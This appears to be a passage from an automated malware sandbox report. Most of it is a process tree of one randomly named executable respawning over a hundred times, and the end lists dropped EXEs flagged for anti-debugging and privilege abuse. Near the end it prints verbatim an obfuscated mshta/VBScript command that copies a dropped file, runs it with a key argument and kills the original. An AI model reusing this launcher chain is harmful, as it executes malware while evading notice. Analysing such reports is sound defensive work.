- - C:\Users\Admin\Documents\nEY1yGXSpSN1aQEspYCrm9J1.exe
    C:\Users\Admin\Documents\nEY1yGXSpSN1aQEspYCrm9J1.exe
    3⤵
    PID:14136
- - C:\Users\Admin\Documents\nEY1yGXSpSN1aQEspYCrm9J1.exe
    C:\Users\Admin\Documents\nEY1yGXSpSN1aQEspYCrm9J1.exe
    3⤵
    PID:21836
- - C:\Users\Admin\Documents\nEY1yGXSpSN1aQEspYCrm9J1.exe
    C:\Users\Admin\Documents\nEY1yGXSpSN1aQEspYCrm9J1.exe
    3⤵
    PID:22160
- - C:\Users\Admin\Documents\nEY1yGXSpSN1aQEspYCrm9J1.exe
    C:\Users\Admin\Documents\nEY1yGXSpSN1aQEspYCrm9J1.exe
    3⤵
    PID:17460
- - C:\Users\Admin\Documents\nEY1yGXSpSN1aQEspYCrm9J1.exe
    C:\Users\Admin\Documents\nEY1yGXSpSN1aQEspYCrm9J1.exe
    3⤵
    PID:8584
- - C:\Users\Admin\Documents\nEY1yGXSpSN1aQEspYCrm9J1.exe
    C:\Users\Admin\Documents\nEY1yGXSpSN1aQEspYCrm9J1.exe
    3⤵
    PID:22324
- - C:\Users\Admin\Documents\nEY1yGXSpSN1aQEspYCrm9J1.exe
    C:\Users\Admin\Documents\nEY1yGXSpSN1aQEspYCrm9J1.exe
    3⤵
    PID:21604
- - C:\Users\Admin\Documents\nEY1yGXSpSN1aQEspYCrm9J1.exe
    C:\Users\Admin\Documents\nEY1yGXSpSN1aQEspYCrm9J1.exe
    3⤵
    PID:18344
- - C:\Users\Admin\Documents\nEY1yGXSpSN1aQEspYCrm9J1.exe
    C:\Users\Admin\Documents\nEY1yGXSpSN1aQEspYCrm9J1.exe
    3⤵
    PID:21568
- - C:\Users\Admin\Documents\nEY1yGXSpSN1aQEspYCrm9J1.exe
    C:\Users\Admin\Documents\nEY1yGXSpSN1aQEspYCrm9J1.exe
    3⤵
    PID:8772
- - C:\Users\Admin\Documents\nEY1yGXSpSN1aQEspYCrm9J1.exe
    C:\Users\Admin\Documents\nEY1yGXSpSN1aQEspYCrm9J1.exe
    3⤵
    PID:22272
- - C:\Users\Admin\Documents\nEY1yGXSpSN1aQEspYCrm9J1.exe
    C:\Users\Admin\Documents\nEY1yGXSpSN1aQEspYCrm9J1.exe
    3⤵
    PID:12712
- - C:\Users\Admin\Documents\nEY1yGXSpSN1aQEspYCrm9J1.exe
    C:\Users\Admin\Documents\nEY1yGXSpSN1aQEspYCrm9J1.exe
    3⤵
    PID:19292
- - C:\Users\Admin\Documents\nEY1yGXSpSN1aQEspYCrm9J1.exe
    C:\Users\Admin\Documents\nEY1yGXSpSN1aQEspYCrm9J1.exe
    3⤵
    PID:21632
- - C:\Users\Admin\Documents\nEY1yGXSpSN1aQEspYCrm9J1.exe
    C:\Users\Admin\Documents\nEY1yGXSpSN1aQEspYCrm9J1.exe
    3⤵
    PID:22816
- - C:\Users\Admin\Documents\nEY1yGXSpSN1aQEspYCrm9J1.exe
    C:\Users\Admin\Documents\nEY1yGXSpSN1aQEspYCrm9J1.exe
    3⤵
    PID:23300
- - C:\Users\Admin\Documents\nEY1yGXSpSN1aQEspYCrm9J1.exe
    C:\Users\Admin\Documents\nEY1yGXSpSN1aQEspYCrm9J1.exe
    3⤵
    PID:22660
- - C:\Users\Admin\Documents\nEY1yGXSpSN1aQEspYCrm9J1.exe
    C:\Users\Admin\Documents\nEY1yGXSpSN1aQEspYCrm9J1.exe
    3⤵
    PID:23236
- - C:\Users\Admin\Documents\nEY1yGXSpSN1aQEspYCrm9J1.exe
    C:\Users\Admin\Documents\nEY1yGXSpSN1aQEspYCrm9J1.exe
    3⤵
    PID:22848
- - C:\Users\Admin\Documents\nEY1yGXSpSN1aQEspYCrm9J1.exe
    C:\Users\Admin\Documents\nEY1yGXSpSN1aQEspYCrm9J1.exe
    3⤵
    PID:23596
- - C:\Users\Admin\Documents\nEY1yGXSpSN1aQEspYCrm9J1.exe
    C:\Users\Admin\Documents\nEY1yGXSpSN1aQEspYCrm9J1.exe
    3⤵
    PID:23848
- - C:\Users\Admin\Documents\nEY1yGXSpSN1aQEspYCrm9J1.exe
    C:\Users\Admin\Documents\nEY1yGXSpSN1aQEspYCrm9J1.exe
    3⤵
    PID:24264
- - C:\Users\Admin\Documents\nEY1yGXSpSN1aQEspYCrm9J1.exe
    C:\Users\Admin\Documents\nEY1yGXSpSN1aQEspYCrm9J1.exe
    3⤵
    PID:21764
- - C:\Users\Admin\Documents\nEY1yGXSpSN1aQEspYCrm9J1.exe
    C:\Users\Admin\Documents\nEY1yGXSpSN1aQEspYCrm9J1.exe
    3⤵
    PID:23920
- - C:\Users\Admin\Documents\nEY1yGXSpSN1aQEspYCrm9J1.exe
    C:\Users\Admin\Documents\nEY1yGXSpSN1aQEspYCrm9J1.exe
    3⤵
    PID:24124
- - C:\Users\Admin\Documents\nEY1yGXSpSN1aQEspYCrm9J1.exe
    C:\Users\Admin\Documents\nEY1yGXSpSN1aQEspYCrm9J1.exe
    3⤵
    PID:24404
- - C:\Users\Admin\Documents\nEY1yGXSpSN1aQEspYCrm9J1.exe
    C:\Users\Admin\Documents\nEY1yGXSpSN1aQEspYCrm9J1.exe
    3⤵
    PID:18756
- - C:\Users\Admin\Documents\nEY1yGXSpSN1aQEspYCrm9J1.exe
    C:\Users\Admin\Documents\nEY1yGXSpSN1aQEspYCrm9J1.exe
    3⤵
    PID:12660
- - C:\Users\Admin\Documents\nEY1yGXSpSN1aQEspYCrm9J1.exe
    C:\Users\Admin\Documents\nEY1yGXSpSN1aQEspYCrm9J1.exe
    3⤵
    PID:24880
- - C:\Users\Admin\Documents\nEY1yGXSpSN1aQEspYCrm9J1.exe
    C:\Users\Admin\Documents\nEY1yGXSpSN1aQEspYCrm9J1.exe
    3⤵
    PID:25336
- - C:\Users\Admin\Documents\nEY1yGXSpSN1aQEspYCrm9J1.exe
    C:\Users\Admin\Documents\nEY1yGXSpSN1aQEspYCrm9J1.exe
    3⤵
    PID:22296
- - C:\Users\Admin\Documents\nEY1yGXSpSN1aQEspYCrm9J1.exe
    C:\Users\Admin\Documents\nEY1yGXSpSN1aQEspYCrm9J1.exe
    3⤵
    PID:24704
- - C:\Users\Admin\Documents\nEY1yGXSpSN1aQEspYCrm9J1.exe
    C:\Users\Admin\Documents\nEY1yGXSpSN1aQEspYCrm9J1.exe
    3⤵
    PID:25448
- - C:\Users\Admin\Documents\nEY1yGXSpSN1aQEspYCrm9J1.exe
    C:\Users\Admin\Documents\nEY1yGXSpSN1aQEspYCrm9J1.exe
    3⤵
    PID:25304
- - C:\Users\Admin\Documents\nEY1yGXSpSN1aQEspYCrm9J1.exe
    C:\Users\Admin\Documents\nEY1yGXSpSN1aQEspYCrm9J1.exe
    3⤵
    PID:16096
- - C:\Users\Admin\Documents\nEY1yGXSpSN1aQEspYCrm9J1.exe
    C:\Users\Admin\Documents\nEY1yGXSpSN1aQEspYCrm9J1.exe
    3⤵
    PID:24988
- - C:\Users\Admin\Documents\nEY1yGXSpSN1aQEspYCrm9J1.exe
    C:\Users\Admin\Documents\nEY1yGXSpSN1aQEspYCrm9J1.exe
    3⤵
    PID:23356
- - C:\Users\Admin\Documents\nEY1yGXSpSN1aQEspYCrm9J1.exe
    C:\Users\Admin\Documents\nEY1yGXSpSN1aQEspYCrm9J1.exe
    3⤵
    PID:25792
- - C:\Users\Admin\Documents\nEY1yGXSpSN1aQEspYCrm9J1.exe
    C:\Users\Admin\Documents\nEY1yGXSpSN1aQEspYCrm9J1.exe
    3⤵
    PID:26152
- - C:\Users\Admin\Documents\nEY1yGXSpSN1aQEspYCrm9J1.exe
    C:\Users\Admin\Documents\nEY1yGXSpSN1aQEspYCrm9J1.exe
    3⤵
    PID:26424
- - C:\Users\Admin\Documents\nEY1yGXSpSN1aQEspYCrm9J1.exe
    C:\Users\Admin\Documents\nEY1yGXSpSN1aQEspYCrm9J1.exe
    3⤵
    PID:25628
- - C:\Users\Admin\Documents\nEY1yGXSpSN1aQEspYCrm9J1.exe
    C:\Users\Admin\Documents\nEY1yGXSpSN1aQEspYCrm9J1.exe
    3⤵
    PID:24804
- - C:\Users\Admin\Documents\nEY1yGXSpSN1aQEspYCrm9J1.exe
    C:\Users\Admin\Documents\nEY1yGXSpSN1aQEspYCrm9J1.exe
    3⤵
    PID:26096
- - C:\Users\Admin\Documents\nEY1yGXSpSN1aQEspYCrm9J1.exe
    C:\Users\Admin\Documents\nEY1yGXSpSN1aQEspYCrm9J1.exe
    3⤵
    PID:26600
- - C:\Users\Admin\Documents\nEY1yGXSpSN1aQEspYCrm9J1.exe
    C:\Users\Admin\Documents\nEY1yGXSpSN1aQEspYCrm9J1.exe
    3⤵
    PID:9548
- - C:\Users\Admin\Documents\nEY1yGXSpSN1aQEspYCrm9J1.exe
    C:\Users\Admin\Documents\nEY1yGXSpSN1aQEspYCrm9J1.exe
    3⤵
    PID:21508
- - C:\Users\Admin\Documents\nEY1yGXSpSN1aQEspYCrm9J1.exe
    C:\Users\Admin\Documents\nEY1yGXSpSN1aQEspYCrm9J1.exe
    3⤵
    PID:14532
- - C:\Users\Admin\Documents\nEY1yGXSpSN1aQEspYCrm9J1.exe
    C:\Users\Admin\Documents\nEY1yGXSpSN1aQEspYCrm9J1.exe
    3⤵
    PID:19760
- - C:\Users\Admin\Documents\nEY1yGXSpSN1aQEspYCrm9J1.exe
    C:\Users\Admin\Documents\nEY1yGXSpSN1aQEspYCrm9J1.exe
    3⤵
    PID:26964
- - C:\Users\Admin\Documents\nEY1yGXSpSN1aQEspYCrm9J1.exe
    C:\Users\Admin\Documents\nEY1yGXSpSN1aQEspYCrm9J1.exe
    3⤵
    PID:27476
- - C:\Users\Admin\Documents\nEY1yGXSpSN1aQEspYCrm9J1.exe
    C:\Users\Admin\Documents\nEY1yGXSpSN1aQEspYCrm9J1.exe
    3⤵
    PID:27244
- - C:\Users\Admin\Documents\nEY1yGXSpSN1aQEspYCrm9J1.exe
    C:\Users\Admin\Documents\nEY1yGXSpSN1aQEspYCrm9J1.exe
    3⤵
    PID:27448
- - C:\Users\Admin\Documents\nEY1yGXSpSN1aQEspYCrm9J1.exe
    C:\Users\Admin\Documents\nEY1yGXSpSN1aQEspYCrm9J1.exe
    3⤵
    PID:24820
- - C:\Users\Admin\Documents\nEY1yGXSpSN1aQEspYCrm9J1.exe
    C:\Users\Admin\Documents\nEY1yGXSpSN1aQEspYCrm9J1.exe
    3⤵
    PID:11464
- - C:\Users\Admin\Documents\nEY1yGXSpSN1aQEspYCrm9J1.exe
    C:\Users\Admin\Documents\nEY1yGXSpSN1aQEspYCrm9J1.exe
    3⤵
    PID:1772
- - C:\Users\Admin\Documents\nEY1yGXSpSN1aQEspYCrm9J1.exe
    C:\Users\Admin\Documents\nEY1yGXSpSN1aQEspYCrm9J1.exe
    3⤵
    PID:17680
- - C:\Users\Admin\Documents\nEY1yGXSpSN1aQEspYCrm9J1.exe
    C:\Users\Admin\Documents\nEY1yGXSpSN1aQEspYCrm9J1.exe
    3⤵
    PID:25460
- - C:\Users\Admin\Documents\nEY1yGXSpSN1aQEspYCrm9J1.exe
    C:\Users\Admin\Documents\nEY1yGXSpSN1aQEspYCrm9J1.exe
    3⤵
    PID:26192
- - C:\Users\Admin\Documents\nEY1yGXSpSN1aQEspYCrm9J1.exe
    C:\Users\Admin\Documents\nEY1yGXSpSN1aQEspYCrm9J1.exe
    3⤵
    PID:27700
- - C:\Users\Admin\Documents\nEY1yGXSpSN1aQEspYCrm9J1.exe
    C:\Users\Admin\Documents\nEY1yGXSpSN1aQEspYCrm9J1.exe
    3⤵
    PID:28116
- - C:\Users\Admin\Documents\nEY1yGXSpSN1aQEspYCrm9J1.exe
    C:\Users\Admin\Documents\nEY1yGXSpSN1aQEspYCrm9J1.exe
    3⤵
    PID:28592
- - C:\Users\Admin\Documents\nEY1yGXSpSN1aQEspYCrm9J1.exe
    C:\Users\Admin\Documents\nEY1yGXSpSN1aQEspYCrm9J1.exe
    3⤵
    PID:21792
- - C:\Users\Admin\Documents\nEY1yGXSpSN1aQEspYCrm9J1.exe
    C:\Users\Admin\Documents\nEY1yGXSpSN1aQEspYCrm9J1.exe
    3⤵
    PID:11748
- - C:\Users\Admin\Documents\nEY1yGXSpSN1aQEspYCrm9J1.exe
    C:\Users\Admin\Documents\nEY1yGXSpSN1aQEspYCrm9J1.exe
    3⤵
    PID:11092
- - C:\Users\Admin\Documents\nEY1yGXSpSN1aQEspYCrm9J1.exe
    C:\Users\Admin\Documents\nEY1yGXSpSN1aQEspYCrm9J1.exe
    3⤵
    PID:16332
- - C:\Users\Admin\Documents\nEY1yGXSpSN1aQEspYCrm9J1.exe
    C:\Users\Admin\Documents\nEY1yGXSpSN1aQEspYCrm9J1.exe
    3⤵
    PID:18344
- - C:\Users\Admin\Documents\nEY1yGXSpSN1aQEspYCrm9J1.exe
    C:\Users\Admin\Documents\nEY1yGXSpSN1aQEspYCrm9J1.exe
    3⤵
    PID:10156
- - C:\Users\Admin\Documents\nEY1yGXSpSN1aQEspYCrm9J1.exe
    C:\Users\Admin\Documents\nEY1yGXSpSN1aQEspYCrm9J1.exe
    3⤵
    PID:11100
- - C:\Users\Admin\Documents\nEY1yGXSpSN1aQEspYCrm9J1.exe
    C:\Users\Admin\Documents\nEY1yGXSpSN1aQEspYCrm9J1.exe
    3⤵
    PID:2224
- - C:\Users\Admin\Documents\nEY1yGXSpSN1aQEspYCrm9J1.exe
    C:\Users\Admin\Documents\nEY1yGXSpSN1aQEspYCrm9J1.exe
    3⤵
    PID:22860
- - C:\Users\Admin\Documents\nEY1yGXSpSN1aQEspYCrm9J1.exe
    C:\Users\Admin\Documents\nEY1yGXSpSN1aQEspYCrm9J1.exe
    3⤵
    PID:9060
- - C:\Users\Admin\Documents\nEY1yGXSpSN1aQEspYCrm9J1.exe
    C:\Users\Admin\Documents\nEY1yGXSpSN1aQEspYCrm9J1.exe
    3⤵
    PID:8892
- - C:\Users\Admin\Documents\nEY1yGXSpSN1aQEspYCrm9J1.exe
    C:\Users\Admin\Documents\nEY1yGXSpSN1aQEspYCrm9J1.exe
    3⤵
    PID:11256
- - C:\Users\Admin\Documents\nEY1yGXSpSN1aQEspYCrm9J1.exe
    C:\Users\Admin\Documents\nEY1yGXSpSN1aQEspYCrm9J1.exe
    3⤵
    PID:11520
- - C:\Users\Admin\Documents\nEY1yGXSpSN1aQEspYCrm9J1.exe
    C:\Users\Admin\Documents\nEY1yGXSpSN1aQEspYCrm9J1.exe
    3⤵
    PID:1732
- - C:\Users\Admin\Documents\nEY1yGXSpSN1aQEspYCrm9J1.exe
    C:\Users\Admin\Documents\nEY1yGXSpSN1aQEspYCrm9J1.exe
    3⤵
    PID:11936
- - C:\Users\Admin\Documents\nEY1yGXSpSN1aQEspYCrm9J1.exe
    C:\Users\Admin\Documents\nEY1yGXSpSN1aQEspYCrm9J1.exe
    3⤵
    PID:27004
- - C:\Users\Admin\Documents\nEY1yGXSpSN1aQEspYCrm9J1.exe
    C:\Users\Admin\Documents\nEY1yGXSpSN1aQEspYCrm9J1.exe
    3⤵
    PID:22468
- - C:\Users\Admin\Documents\nEY1yGXSpSN1aQEspYCrm9J1.exe
    C:\Users\Admin\Documents\nEY1yGXSpSN1aQEspYCrm9J1.exe
    3⤵
    PID:29120
- - C:\Users\Admin\Documents\nEY1yGXSpSN1aQEspYCrm9J1.exe
    C:\Users\Admin\Documents\nEY1yGXSpSN1aQEspYCrm9J1.exe
    3⤵
    PID:29492
- - C:\Users\Admin\Documents\nEY1yGXSpSN1aQEspYCrm9J1.exe
    C:\Users\Admin\Documents\nEY1yGXSpSN1aQEspYCrm9J1.exe
    3⤵
    PID:29100
- - C:\Users\Admin\Documents\nEY1yGXSpSN1aQEspYCrm9J1.exe
    C:\Users\Admin\Documents\nEY1yGXSpSN1aQEspYCrm9J1.exe
    3⤵
    PID:29384
- - C:\Users\Admin\Documents\nEY1yGXSpSN1aQEspYCrm9J1.exe
    C:\Users\Admin\Documents\nEY1yGXSpSN1aQEspYCrm9J1.exe
    3⤵
    PID:27252
- - C:\Users\Admin\Documents\nEY1yGXSpSN1aQEspYCrm9J1.exe
    C:\Users\Admin\Documents\nEY1yGXSpSN1aQEspYCrm9J1.exe
    3⤵
    PID:29356
- - C:\Users\Admin\Documents\nEY1yGXSpSN1aQEspYCrm9J1.exe
    C:\Users\Admin\Documents\nEY1yGXSpSN1aQEspYCrm9J1.exe
    3⤵
    PID:14760
- - C:\Users\Admin\Documents\nEY1yGXSpSN1aQEspYCrm9J1.exe
    C:\Users\Admin\Documents\nEY1yGXSpSN1aQEspYCrm9J1.exe
    3⤵
    PID:19856
- - C:\Users\Admin\Documents\nEY1yGXSpSN1aQEspYCrm9J1.exe
    C:\Users\Admin\Documents\nEY1yGXSpSN1aQEspYCrm9J1.exe
    3⤵
    PID:30136
- - C:\Users\Admin\Documents\nEY1yGXSpSN1aQEspYCrm9J1.exe
    C:\Users\Admin\Documents\nEY1yGXSpSN1aQEspYCrm9J1.exe
    3⤵
    PID:22120
- - C:\Users\Admin\Documents\nEY1yGXSpSN1aQEspYCrm9J1.exe
    C:\Users\Admin\Documents\nEY1yGXSpSN1aQEspYCrm9J1.exe
    3⤵
    PID:30200
- - C:\Users\Admin\Documents\nEY1yGXSpSN1aQEspYCrm9J1.exe
    C:\Users\Admin\Documents\nEY1yGXSpSN1aQEspYCrm9J1.exe
    3⤵
    PID:2092
- - C:\Users\Admin\Documents\nEY1yGXSpSN1aQEspYCrm9J1.exe
    C:\Users\Admin\Documents\nEY1yGXSpSN1aQEspYCrm9J1.exe
    3⤵
    PID:30744
- - C:\Users\Admin\Documents\nEY1yGXSpSN1aQEspYCrm9J1.exe
    C:\Users\Admin\Documents\nEY1yGXSpSN1aQEspYCrm9J1.exe
    3⤵
    PID:31080
- - C:\Users\Admin\Documents\nEY1yGXSpSN1aQEspYCrm9J1.exe
    C:\Users\Admin\Documents\nEY1yGXSpSN1aQEspYCrm9J1.exe
    3⤵
    PID:31476
- - C:\Users\Admin\Documents\nEY1yGXSpSN1aQEspYCrm9J1.exe
    C:\Users\Admin\Documents\nEY1yGXSpSN1aQEspYCrm9J1.exe
    3⤵
    PID:30736
- - C:\Users\Admin\Documents\nEY1yGXSpSN1aQEspYCrm9J1.exe
    C:\Users\Admin\Documents\nEY1yGXSpSN1aQEspYCrm9J1.exe
    3⤵
    PID:30832
- - C:\Users\Admin\Documents\nEY1yGXSpSN1aQEspYCrm9J1.exe
    C:\Users\Admin\Documents\nEY1yGXSpSN1aQEspYCrm9J1.exe
    3⤵
    PID:17040
- - C:\Users\Admin\Documents\nEY1yGXSpSN1aQEspYCrm9J1.exe
    C:\Users\Admin\Documents\nEY1yGXSpSN1aQEspYCrm9J1.exe
    3⤵
    PID:31692
- - C:\Users\Admin\Documents\nEY1yGXSpSN1aQEspYCrm9J1.exe
    C:\Users\Admin\Documents\nEY1yGXSpSN1aQEspYCrm9J1.exe
    3⤵
    PID:30972
- - C:\Users\Admin\Documents\nEY1yGXSpSN1aQEspYCrm9J1.exe
    C:\Users\Admin\Documents\nEY1yGXSpSN1aQEspYCrm9J1.exe
    3⤵
    PID:2404
- - C:\Users\Admin\Documents\nEY1yGXSpSN1aQEspYCrm9J1.exe
    C:\Users\Admin\Documents\nEY1yGXSpSN1aQEspYCrm9J1.exe
    3⤵
    PID:11764
- - C:\Users\Admin\Documents\nEY1yGXSpSN1aQEspYCrm9J1.exe
    C:\Users\Admin\Documents\nEY1yGXSpSN1aQEspYCrm9J1.exe
    3⤵
    PID:31560
- - C:\Users\Admin\Documents\nEY1yGXSpSN1aQEspYCrm9J1.exe
    C:\Users\Admin\Documents\nEY1yGXSpSN1aQEspYCrm9J1.exe
    3⤵
    PID:31100
- - C:\Users\Admin\Documents\nEY1yGXSpSN1aQEspYCrm9J1.exe
    C:\Users\Admin\Documents\nEY1yGXSpSN1aQEspYCrm9J1.exe
    3⤵
    PID:30164
- - C:\Users\Admin\Documents\nEY1yGXSpSN1aQEspYCrm9J1.exe
    C:\Users\Admin\Documents\nEY1yGXSpSN1aQEspYCrm9J1.exe
    3⤵
    PID:30204
- - C:\Users\Admin\Documents\nEY1yGXSpSN1aQEspYCrm9J1.exe
    C:\Users\Admin\Documents\nEY1yGXSpSN1aQEspYCrm9J1.exe
    3⤵
    PID:32108
- - C:\Users\Admin\Documents\nEY1yGXSpSN1aQEspYCrm9J1.exe
    C:\Users\Admin\Documents\nEY1yGXSpSN1aQEspYCrm9J1.exe
    3⤵
    PID:32524
- - C:\Users\Admin\Documents\nEY1yGXSpSN1aQEspYCrm9J1.exe
    C:\Users\Admin\Documents\nEY1yGXSpSN1aQEspYCrm9J1.exe
    3⤵
    PID:20872
- - C:\Users\Admin\Documents\nEY1yGXSpSN1aQEspYCrm9J1.exe
    C:\Users\Admin\Documents\nEY1yGXSpSN1aQEspYCrm9J1.exe
    3⤵
    PID:30352
- - C:\Users\Admin\Documents\nEY1yGXSpSN1aQEspYCrm9J1.exe
    C:\Users\Admin\Documents\nEY1yGXSpSN1aQEspYCrm9J1.exe
    3⤵
    PID:32452
- - C:\Users\Admin\Documents\nEY1yGXSpSN1aQEspYCrm9J1.exe
    C:\Users\Admin\Documents\nEY1yGXSpSN1aQEspYCrm9J1.exe
    3⤵
    PID:7192
- - C:\Users\Admin\Documents\nEY1yGXSpSN1aQEspYCrm9J1.exe
    C:\Users\Admin\Documents\nEY1yGXSpSN1aQEspYCrm9J1.exe
    3⤵
    PID:31036
- - C:\Users\Admin\Documents\nEY1yGXSpSN1aQEspYCrm9J1.exe
    C:\Users\Admin\Documents\nEY1yGXSpSN1aQEspYCrm9J1.exe
    3⤵
    PID:23912
- - C:\Users\Admin\Documents\nEY1yGXSpSN1aQEspYCrm9J1.exe
    C:\Users\Admin\Documents\nEY1yGXSpSN1aQEspYCrm9J1.exe
    3⤵
    PID:32140
- - C:\Users\Admin\Documents\nEY1yGXSpSN1aQEspYCrm9J1.exe
    C:\Users\Admin\Documents\nEY1yGXSpSN1aQEspYCrm9J1.exe
    3⤵
    PID:31396
- - C:\Users\Admin\Documents\nEY1yGXSpSN1aQEspYCrm9J1.exe
    C:\Users\Admin\Documents\nEY1yGXSpSN1aQEspYCrm9J1.exe
    3⤵
    PID:31904
- - C:\Users\Admin\Documents\nEY1yGXSpSN1aQEspYCrm9J1.exe
    C:\Users\Admin\Documents\nEY1yGXSpSN1aQEspYCrm9J1.exe
    3⤵
    PID:12472
- - C:\Users\Admin\Documents\nEY1yGXSpSN1aQEspYCrm9J1.exe
    C:\Users\Admin\Documents\nEY1yGXSpSN1aQEspYCrm9J1.exe
    3⤵
    PID:2344
- - C:\Users\Admin\Documents\nEY1yGXSpSN1aQEspYCrm9J1.exe
    C:\Users\Admin\Documents\nEY1yGXSpSN1aQEspYCrm9J1.exe
    3⤵
    PID:16412
- - C:\Users\Admin\Documents\nEY1yGXSpSN1aQEspYCrm9J1.exe
    C:\Users\Admin\Documents\nEY1yGXSpSN1aQEspYCrm9J1.exe
    3⤵
    PID:13688
- - C:\Users\Admin\Documents\nEY1yGXSpSN1aQEspYCrm9J1.exe
    C:\Users\Admin\Documents\nEY1yGXSpSN1aQEspYCrm9J1.exe
    3⤵
    PID:18140
- - C:\Users\Admin\Documents\nEY1yGXSpSN1aQEspYCrm9J1.exe
    C:\Users\Admin\Documents\nEY1yGXSpSN1aQEspYCrm9J1.exe
    3⤵
    PID:29452
- - C:\Users\Admin\Documents\nEY1yGXSpSN1aQEspYCrm9J1.exe
    C:\Users\Admin\Documents\nEY1yGXSpSN1aQEspYCrm9J1.exe
    3⤵
    PID:30888
- - C:\Users\Admin\Documents\nEY1yGXSpSN1aQEspYCrm9J1.exe
    C:\Users\Admin\Documents\nEY1yGXSpSN1aQEspYCrm9J1.exe
    3⤵
    PID:30676
- - C:\Users\Admin\Documents\nEY1yGXSpSN1aQEspYCrm9J1.exe
    C:\Users\Admin\Documents\nEY1yGXSpSN1aQEspYCrm9J1.exe
    3⤵
    PID:31672
- - C:\Users\Admin\Documents\nEY1yGXSpSN1aQEspYCrm9J1.exe
    C:\Users\Admin\Documents\nEY1yGXSpSN1aQEspYCrm9J1.exe
    3⤵
    PID:27076
- - C:\Users\Admin\Documents\nEY1yGXSpSN1aQEspYCrm9J1.exe
    C:\Users\Admin\Documents\nEY1yGXSpSN1aQEspYCrm9J1.exe
    3⤵
    PID:28988
- - C:\Users\Admin\Documents\nEY1yGXSpSN1aQEspYCrm9J1.exe
    C:\Users\Admin\Documents\nEY1yGXSpSN1aQEspYCrm9J1.exe
    3⤵
    PID:27076
- - C:\Users\Admin\Documents\nEY1yGXSpSN1aQEspYCrm9J1.exe
    C:\Users\Admin\Documents\nEY1yGXSpSN1aQEspYCrm9J1.exe
    3⤵
    PID:31620
- - C:\Users\Admin\Documents\nEY1yGXSpSN1aQEspYCrm9J1.exe
    C:\Users\Admin\Documents\nEY1yGXSpSN1aQEspYCrm9J1.exe
    3⤵
    PID:4480
- - C:\Users\Admin\Documents\nEY1yGXSpSN1aQEspYCrm9J1.exe
    C:\Users\Admin\Documents\nEY1yGXSpSN1aQEspYCrm9J1.exe
    3⤵
    PID:33296
- - C:\Users\Admin\Documents\nEY1yGXSpSN1aQEspYCrm9J1.exe
    C:\Users\Admin\Documents\nEY1yGXSpSN1aQEspYCrm9J1.exe
    3⤵
    PID:33632
- - C:\Users\Admin\Documents\nEY1yGXSpSN1aQEspYCrm9J1.exe
    C:\Users\Admin\Documents\nEY1yGXSpSN1aQEspYCrm9J1.exe
    3⤵
    PID:24004
- - C:\Users\Admin\Documents\nEY1yGXSpSN1aQEspYCrm9J1.exe
    C:\Users\Admin\Documents\nEY1yGXSpSN1aQEspYCrm9J1.exe
    3⤵
    PID:33088
- - C:\Users\Admin\Documents\nEY1yGXSpSN1aQEspYCrm9J1.exe
    C:\Users\Admin\Documents\nEY1yGXSpSN1aQEspYCrm9J1.exe
    3⤵
    PID:33736
- - C:\Users\Admin\Documents\nEY1yGXSpSN1aQEspYCrm9J1.exe
    C:\Users\Admin\Documents\nEY1yGXSpSN1aQEspYCrm9J1.exe
    3⤵
    PID:32992
- - C:\Users\Admin\Documents\nEY1yGXSpSN1aQEspYCrm9J1.exe
    C:\Users\Admin\Documents\nEY1yGXSpSN1aQEspYCrm9J1.exe
    3⤵
    PID:32928
- - C:\Users\Admin\Documents\nEY1yGXSpSN1aQEspYCrm9J1.exe
    C:\Users\Admin\Documents\nEY1yGXSpSN1aQEspYCrm9J1.exe
    3⤵
    PID:32444
- - C:\Users\Admin\Documents\nEY1yGXSpSN1aQEspYCrm9J1.exe
    C:\Users\Admin\Documents\nEY1yGXSpSN1aQEspYCrm9J1.exe
    3⤵
    PID:33444
- - C:\Users\Admin\Documents\nEY1yGXSpSN1aQEspYCrm9J1.exe
    C:\Users\Admin\Documents\nEY1yGXSpSN1aQEspYCrm9J1.exe
    3⤵
    PID:32864
- - C:\Users\Admin\Documents\nEY1yGXSpSN1aQEspYCrm9J1.exe
    C:\Users\Admin\Documents\nEY1yGXSpSN1aQEspYCrm9J1.exe
    3⤵
    PID:31064
- - C:\Users\Admin\Documents\nEY1yGXSpSN1aQEspYCrm9J1.exe
    C:\Users\Admin\Documents\nEY1yGXSpSN1aQEspYCrm9J1.exe
    3⤵
    PID:32300
- C:\Users\Admin\Documents\vtoihT1va0ZfxbUHZI21TZ4m.exe
  "C:\Users\Admin\Documents\vtoihT1va0ZfxbUHZI21TZ4m.exe"
  2⤵
  - Executes dropped EXE
  - Checks BIOS information in registry
  - Checks whether UAC is enabled
  - Suspicious use of NtSetInformationThreadHideFromDebugger
  - Suspicious use of AdjustPrivilegeToken
  PID:788
- C:\Users\Admin\Documents\8oZeWKkA0nHwtXnLVgRQz3Ww.exe
  "C:\Users\Admin\Documents\8oZeWKkA0nHwtXnLVgRQz3Ww.exe"
  2⤵
  - Executes dropped EXE
  PID:1260
- - C:\Windows\SysWOW64\mshta.exe
    "C:\Windows\System32\mshta.exe" VBSCripT: CloSe ( CReateOBjecT ("wSCRipT.sheLl"). RUN ( "cmD /q /C TYPe ""C:\Users\Admin\Documents\8oZeWKkA0nHwtXnLVgRQz3Ww.exe"" > Bx0IuOFB.ExE && StArT BX0iUoFB.EXe -PyTJSIPDC12bsxp0f1 & iF """" == """" for %Q in ( ""C:\Users\Admin\Documents\8oZeWKkA0nHwtXnLVgRQz3Ww.exe"" ) do taskkill -F -im ""%~NxQ"" ", 0, truE) )
    3⤵
    PID:5440
  - - C:\Windows\SysWOW64\cmd.exe
      "C:\Windows\System32\cmd.exe" /q /C TYPe "C:\Users\Admin\Documents\8oZeWKkA0nHwtXnLVgRQz3Ww.exe" >Bx0IuOFB.ExE && StArT BX0iUoFB.EXe -PyTJSIPDC12bsxp0f1 & iF "" == "" for %Q in ("C:\Users\Admin\Documents\8oZeWKkA0nHwtXnLVgRQz3Ww.exe" ) do taskkill -F -im "%~NxQ"
      4⤵
      PID:6412
    - - C:\Users\Admin\AppData\Local\Temp\Bx0IuOFB.ExE
        
        BX0iUoFB.EXe -PyTJSIPDC12bsxp0f1
        5⤵
        
        PID:4724
      - C:\Windows\SysWOW64\mshta.exe
        
